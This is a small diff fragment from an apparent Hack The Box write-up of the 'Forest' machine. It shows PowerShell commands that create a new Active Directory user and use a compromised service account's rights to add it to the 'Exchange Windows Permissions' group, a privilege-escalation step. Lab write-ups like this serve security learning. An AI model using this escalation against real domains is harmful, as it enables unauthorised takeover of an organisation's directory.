yaboygmoney/HackTheBoxWriteups/forest.md

 New-ADUser ybgm -AccountPassword $pass -Enabled $True
 ```

-I'm also going to add myself to the "Exchange Windows Permissions" group.
+I'm also going to use svc-alfresco's permissions to add my new user to the "Exchange Windows Permissions" group.

 ```powershell
 Add-ADGroupMember -Identity "Exchange Windows Permissions" -members ybgm